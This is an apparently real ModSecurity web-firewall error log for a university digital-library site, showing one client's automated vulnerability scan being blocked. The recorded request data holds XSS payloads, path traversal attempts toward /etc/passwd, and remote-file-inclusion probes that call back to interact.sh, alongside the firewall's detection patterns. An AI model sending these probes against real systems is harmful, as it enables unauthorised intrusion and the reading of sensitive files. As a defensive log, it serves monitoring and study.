[Tue Aug 29 11:52:33.641583 2023] [:error] [pid 2571] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(^[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+|[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+$)" at ARGS:type. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "64"] [id "981318"] [rev "2"] [msg "SQL Injection Attack: Common Injection Testing Detected"] [data "Matched Data: \\x22 found within ARGS:type: xss\\x22 onmouseover=alert(document.domain) \\x22"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "digilibfeb.unla.ac.id"] [uri "/main/calendar/agenda_list.php"] [unique_id "ZO15kcCo-f0AAAoLfGsAAAAG"]
[Tue Aug 29 11:52:34.635002 2023] [:error] [pid 2525] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "([\\\\~\\\\!\\\\@\\\\#\\\\$\\\\%\\\\^\\\\&\\\\*\\\\(\\\\)\\\\-\\\\+\\\\=\\\\{\\\\}\\\\[\\\\]\\\\|\\\\:\\\\;\\"\\\\'\\\\\\xc2\\xb4\\\\\\xe2\\x80\\x99\\\\\\xe2\\x80\\x98\\\\`\\\\<\\\\>].*?){4,}" at ARGS:email_create. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "159"] [id "981173"] [rev "2"] [msg "Restricted SQL Character Anomaly Detection Alert - Total # of special characters exceeded"] [data "Matched Data: ( found within ARGS:email_create: 2Ue0GylxOzjssB9Fxo2BoPQRLhR@bIUx0.com\\x22 onmouseover=alert(document.domain) y="] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [hostname "digilibfeb.unla.ac.id"] [uri "/"] [unique_id "ZO15ksCo-f0AAAnd3IAAAAAI"]
[Tue Aug 29 11:52:34.675674 2023] [:error] [pid 2525] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\b([\\\\d\\\\w]++)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)(?:(?:=|<=>|r?like|sounds\\\\s+like|regexp)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\2\\\\b|(?:!=|<=|>=|<>|<|>|\\\\^|is\\\\s+not ..." at ARGS:tab. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "77"] [id "950901"] [rev "2"] [msg "SQL Injection Attack: SQL Tautology Detected."] [data "Matched Data: script>alert found within ARGS:tab: </script><script>alert(document.domain)</script>"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "digilibfeb.unla.ac.id"] [uri "/wp-admin/admin.php"] [unique_id "ZO15ksCo-f0AAAnd3IIAAAAI"]
[Tue Aug 29 11:52:36.750408 2023] [:error] [pid 2503] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:DOC. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../../ found within ARGS:DOC: ../../../../etc/passwd"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "digilibfeb.unla.ac.id"] [uri "/wgarcmin.cgi"] [unique_id "ZO15lMCo-f0AAAnHQkYAAAAT"]
[Tue Aug 29 11:52:37.543893 2023] [:error] [pid 2575] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:fileid. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../../../../../../../../ found within ARGS:fileid: ../../../../../../../../../../etc/passwd\\x00"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "digilibfeb.unla.ac.id"] [uri "/index.php"] [unique_id "ZO15lcCo-f0AAAoPuV4AAAAM"]
[Tue Aug 29 11:52:37.639175 2023] [:error] [pid 2579] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "([\\\\~\\\\!\\\\@\\\\#\\\\$\\\\%\\\\^\\\\&\\\\*\\\\(\\\\)\\\\-\\\\+\\\\=\\\\{\\\\}\\\\[\\\\]\\\\|\\\\:\\\\;\\"\\\\'\\\\\\xc2\\xb4\\\\\\xe2\\x80\\x99\\\\\\xe2\\x80\\x98\\\\`\\\\<\\\\>].*?){4,}" at ARGS:expires_in. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "159"] [id "981173"] [rev "2"] [msg "Restricted SQL Character Anomaly Detection Alert - Total # of special characters exceeded"] [data "Matched Data: > found within ARGS:expires_in: <img src onerror=alert(document.domain)>"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [hostname "digilibfeb.unla.ac.id"] [uri "/wp-admin/admin-ajax.php"] [unique_id "ZO15lcCo-f0AAAoT7NgAAAAD"]
[Tue Aug 29 11:52:40.055221 2023] [:error] [pid 2515] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Match of "beginsWith %{request_headers.host}" against "TX:1" required. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "163"] [id "950120"] [rev "3"] [msg "Possible Remote File Inclusion (RFI) Attack: Off-Domain Reference/Link"] [data "Matched Data: https://google.com<Svg/onload=alert(document.domain)> found within TX:1: google.com<Svg/onload=alert(document.domain)>"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/RFI"] [hostname "digilibfeb.unla.ac.id"] [uri "/fmlurlsvc/"] [unique_id "ZO15mMCo-f0AAAnTlTEAAAAA"]
[Tue Aug 29 11:52:40.536483 2023] [:error] [pid 2580] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\b([\\\\d\\\\w]++)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)(?:(?:=|<=>|r?like|sounds\\\\s+like|regexp)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\2\\\\b|(?:!=|<=|>=|<>|<|>|\\\\^|is\\\\s+not ..." at ARGS:out. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "77"] [id "950901"] [rev "2"] [msg "SQL Injection Attack: SQL Tautology Detected."] [data "Matched Data: script>alert found within ARGS:out: </script><script>alert(document.domain)</script>"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "digilibfeb.unla.ac.id"] [uri "/client/manage/ourphp_out.php"] [unique_id "ZO15mMCo-f0AAAoUJbcAAAAB"]
[Tue Aug 29 11:52:41.762485 2023] [:error] [pid 2531] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:controller. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../../../../../../../../ found within ARGS:controller: ../../../../../../../../../../etc/passwd\\x00"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "digilibfeb.unla.ac.id"] [uri "/index.php"] [unique_id "ZO15mcCo-f0AAAnjjSsAAAAX"]
[Tue Aug 29 11:52:42.528527 2023] [:error] [pid 2503] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:controller. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: =../../../../../../../../../../ found within ARGS:controller: =../../../../../../../../../../etc/passwd\\x00"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "digilibfeb.unla.ac.id"] [uri "/index.php"] [unique_id "ZO15msCo-f0AAAnHQm4AAAAT"]
[Tue Aug 29 11:52:42.584092 2023] [:error] [pid 2531] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\b([\\\\d\\\\w]++)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)(?:(?:=|<=>|r?like|sounds\\\\s+like|regexp)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\2\\\\b|(?:!=|<=|>=|<>|<|>|\\\\^|is\\\\s+not ..." at ARGS:debug_host. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "77"] [id "950901"] [rev "2"] [msg "SQL Injection Attack: SQL Tautology Detected."] [data "Matched Data: script>alert found within ARGS:debug_host: </script><script>alert(document.domain)</script>"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "digilibfeb.unla.ac.id"] [uri "/index.php"] [unique_id "ZO15msCo-f0AAAnjjS8AAAAX"]
[Tue Aug 29 11:52:45.101690 2023] [:error] [pid 2515] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\b([\\\\d\\\\w]++)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)(?:(?:=|<=>|r?like|sounds\\\\s+like|regexp)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\2\\\\b|(?:!=|<=|>=|<>|<|>|\\\\^|is\\\\s+not ..." at ARGS:version. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "77"] [id "950901"] [rev "2"] [msg "SQL Injection Attack: SQL Tautology Detected."] [data "Matched Data: 0<script found within ARGS:version: 7.5.0<script>confirm(2Ue0HkQR8I3XhDLhgGNgSJ5LNGO)</script>"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "digilibfeb.unla.ac.id"] [uri "/rewe/prod/web/rewe_go_check.php"] [unique_id "ZO15ncCo-f0AAAnTlUUAAAAA"]
[Tue Aug 29 11:52:45.540576 2023] [:error] [pid 2566] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:extra. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: /../../../../../../../../ found within ARGS:extra: /../../../../../../../../etc/passwd"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "digilibfeb.unla.ac.id"] [uri "/cgi-bin/mj_wwwusr"] [unique_id "ZO15ncCo-f0AAAoGFakAAAAE"]
[Tue Aug 29 11:52:45.615014 2023] [:error] [pid 2503] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Match of "beginsWith %{request_headers.host}" against "TX:1" required. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "163"] [id "950120"] [rev "3"] [msg "Possible Remote File Inclusion (RFI) Attack: Off-Domain Reference/Link"] [data "Matched Data: http://interact.sh found within TX:1: interact.sh"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/RFI"] [hostname "digilibfeb.unla.ac.id"] [uri "/openwin.php"] [unique_id "ZO15ncCo-f0AAAnHQnsAAAAT"]
[Tue Aug 29 11:52:46.876373 2023] [:error] [pid 2576] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\b([\\\\d\\\\w]++)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)(?:(?:=|<=>|r?like|sounds\\\\s+like|regexp)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\2\\\\b|(?:!=|<=|>=|<>|<|>|\\\\^|is\\\\s+not ..." at ARGS:redirect_to. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "77"] [id "950901"] [rev "2"] [msg "SQL Injection Attack: SQL Tautology Detected."] [data "Matched Data: script>alert found within ARGS:redirect_to: /asdf\\x22><script>alert(document.domain)</script>"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "digilibfeb.unla.ac.id"] [uri "/demo/api/logout"] [unique_id "ZO15nsCo-f0AAAoQ3NEAAAAN"]
[Tue Aug 29 11:52:47.647657 2023] [:error] [pid 2576] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Match of "beginsWith %{request_headers.host}" against "TX:1" required. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "163"] [id "950120"] [rev "3"] [msg "Possible Remote File Inclusion (RFI) Attack: Off-Domain Reference/Link"] [data "Matched Data: https://interact.sh found within TX:1: interact.sh"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/RFI"] [hostname "digilibfeb.unla.ac.id"] [uri "/user/login/"] [unique_id "ZO15n8Co-f0AAAoQ3NMAAAAN"]
[Tue Aug 29 11:52:47.665176 2023] [:error] [pid 2566] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:dir. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../..//../../ found within ARGS:dir: ../../..//../../etc/passwd"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "digilibfeb.unla.ac.id"] [uri "/index.php"] [unique_id "ZO15n8Co-f0AAAoGFbMAAAAE"]
[Tue Aug 29 11:52:48.802864 2023] [:error] [pid 2579] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Match of "beginsWith %{request_headers.host}" against "TX:1" required. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "163"] [id "950120"] [rev "3"] [msg "Possible Remote File Inclusion (RFI) Attack: Off-Domain Reference/Link"] [data "Matched Data: https://interact.sh found within TX:1: interact.sh"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/RFI"] [hostname "digilibfeb.unla.ac.id"] [uri "/user/logout"] [unique_id "ZO15oMCo-f0AAAoT7QsAAAAD"]
[Tue Aug 29 11:52:49.551372 2023] [:error] [pid 2574] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\b([\\\\d\\\\w]++)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)(?:(?:=|<=>|r?like|sounds\\\\s+like|regexp)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\2\\\\b|(?:!=|<=|>=|<>|<|>|\\\\^|is\\\\s+not ..." at ARGS:m. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "77"] [id "950901"] [rev "2"] [msg "SQL Injection Attack: SQL Tautology Detected."] [data "Matched Data: script>alert found within ARGS:m: </script><script>alert(document.domain)</script>"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "digilibfeb.unla.ac.id"] [uri "/wp-content/plugins/anti-plagiarism/js.php"] [unique_id "ZO15ocCo-f0AAAoO54wAAAAK"]
[Tue Aug 29 11:52:49.587162 2023] [:error] [pid 2571] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:f. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../../../../../../../../../ found within ARGS:f: ../../../../../../../../../../../etc/passwd\\x00"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "digilibfeb.unla.ac.id"] [uri "/learn/cubemail/filemanagement.php"] [unique_id "ZO15ocCo-f0AAAoLfLYAAAAG"]
[Tue Aug 29 11:52:49.596238 2023] [:error] [pid 2566] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\b([\\\\d\\\\w]++)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)(?:(?:=|<=>|r?like|sounds\\\\s+like|regexp)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\2\\\\b|(?:!=|<=|>=|<>|<|>|\\\\^|is\\\\s+not ..." at ARGS:u. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "77"] [id "950901"] [rev "2"] [msg "SQL Injection Attack: SQL Tautology Detected."] [data "Matched Data: script>alert found within ARGS:u: </script><script>alert(document.domain)</script>"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "digilibfeb.unla.ac.id"] [uri "/tweb/ft.php"] [unique_id "ZO15ocCo-f0AAAoGFboAAAAE"]
[Tue Aug 29 11:52:51.378700 2023] [:error] [pid 2566] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Match of "beginsWith %{request_headers.host}" against "TX:1" required. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "163"] [id "950120"] [rev "3"] [msg "Possible Remote File Inclusion (RFI) Attack: Off-Domain Reference/Link"] [data "Matched Data: https://interact.sh found within TX:1: interact.sh"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/RFI"] [hostname "digilibfeb.unla.ac.id"] [uri "/user/register"] [unique_id "ZO15o8Co-f0AAAoGFcEAAAAE"]
[Tue Aug 29 11:52:51.831467 2023] [:error] [pid 2582] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\b([\\\\d\\\\w]++)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)(?:(?:=|<=>|r?like|sounds\\\\s+like|regexp)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\2\\\\b|(?:!=|<=|>=|<>|<|>|\\\\^|is\\\\s+not ..." at ARGS:id. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "77"] [id "950901"] [rev "2"] [msg "SQL Injection Attack: SQL Tautology Detected."] [data "Matched Data: 1'<script found within ARGS:id: 1'<script>alert(document.domain)</script>"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "digilibfeb.unla.ac.id"] [uri "/"] [unique_id "ZO15o8Co-f0AAAoW7JoAAAAJ"]
[Tue Aug 29 11:52:51.864808 2023] [:error] [pid 2525] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Match of "beginsWith %{request_headers.host}" against "TX:1" required. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "163"] [id "950120"] [rev "3"] [msg "Possible Remote File Inclusion (RFI) Attack: Off-Domain Reference/Link"] [data "Matched Data: https://interact.sh found within TX:1: interact.sh"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/RFI"] [hostname "digilibfeb.unla.ac.id"] [uri "/user/resend-activation"] [unique_id "ZO15o8Co-f0AAAnd3NcAAAAI"]
[Tue Aug 29 11:52:52.651136 2023] [:error] [pid 2515] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\balert\\\\b\\\\W*?\\\\(" at ARGS:loginMode. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_xss_attacks.conf"] [line "163"] [id "958052"] [rev "2"] [msg "Cross-site Scripting (XSS) Attack"] [data "Matched Data: alert( found within ARGS:loginMode: alert(document.domain)"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "8"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/XSS"] [tag "WASCTC/WASC-8"] [tag "WASCTC/WASC-22"] [tag "OWASP_TOP_10/A2"] [tag "OWASP_AppSensor/IE1"] [tag "PCI/6.5.1"] [hostname "digilibfeb.unla.ac.id"] [uri "/MicroStrategyLibrary/auth/ui/loginPage"] [unique_id "ZO15pMCo-f0AAAnTlW8AAAAA"]
[Tue Aug 29 11:52:52.676503 2023] [:error] [pid 2503] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:redirect_to. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ://? found within ARGS:redirect_to: http://?1</sCripT><sCripT>alert(document.domain)</sCripT>"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "digilibfeb.unla.ac.id"] [uri "/wp-login.php"] [unique_id "ZO15pMCo-f0AAAnHQp4AAAAT"]
[Tue Aug 29 11:52:52.700899 2023] [:error] [pid 2503] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:mes. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: >\\x22>< found within ARGS:mes: </script>\\x22><script>alert(123)</script>"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "digilibfeb.unla.ac.id"] [uri "/wp-content/plugins/wp-mailster/view/subscription/unsubscribe2.php"] [unique_id "ZO15pMCo-f0AAAnHQp8AAAAT"]
[Tue Aug 29 11:52:55.632335 2023] [:error] [pid 2575] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:controller. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../../../../../../../../ found within ARGS:controller: ../../../../../../../../../../etc/passwd\\x00"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "digilibfeb.unla.ac.id"] [uri "/index.php"] [unique_id "ZO15p8Co-f0AAAoPuaIAAAAM"]
[Tue Aug 29 11:52:55.928271 2023] [:error] [pid 2571] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(^[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+|[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+$)" at ARGS_NAMES:")',10000000);alert(1337);setTimeout('alert(". [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "64"] [id "981318"] [rev "2"] [msg "SQL Injection Attack: Common Injection Testing Detected"] [data "Matched Data: \\x22 found within ARGS_NAMES:\\x22)',10000000);alert(1337);setTimeout('alert(\\x22: \\x22)',10000000);alert(1337);setTimeout('alert(\\x22"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "digilibfeb.unla.ac.id"] [uri "/www/delivery/afr.php"] [unique_id "ZO15p8Co-f0AAAoLfN8AAAAG"]
[Tue Aug 29 11:52:55.980254 2023] [:error] [pid 2575] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\b([\\\\d\\\\w]++)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)(?:(?:=|<=>|r?like|sounds\\\\s+like|regexp)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\2\\\\b|(?:!=|<=|>=|<>|<|>|\\\\^|is\\\\s+not ..." at ARGS:rsd. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "77"] [id "950901"] [rev "2"] [msg "SQL Injection Attack: SQL Tautology Detected."] [data "Matched Data: script>alert found within ARGS:rsd: </script><script>alert(document.domain)</script>"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag 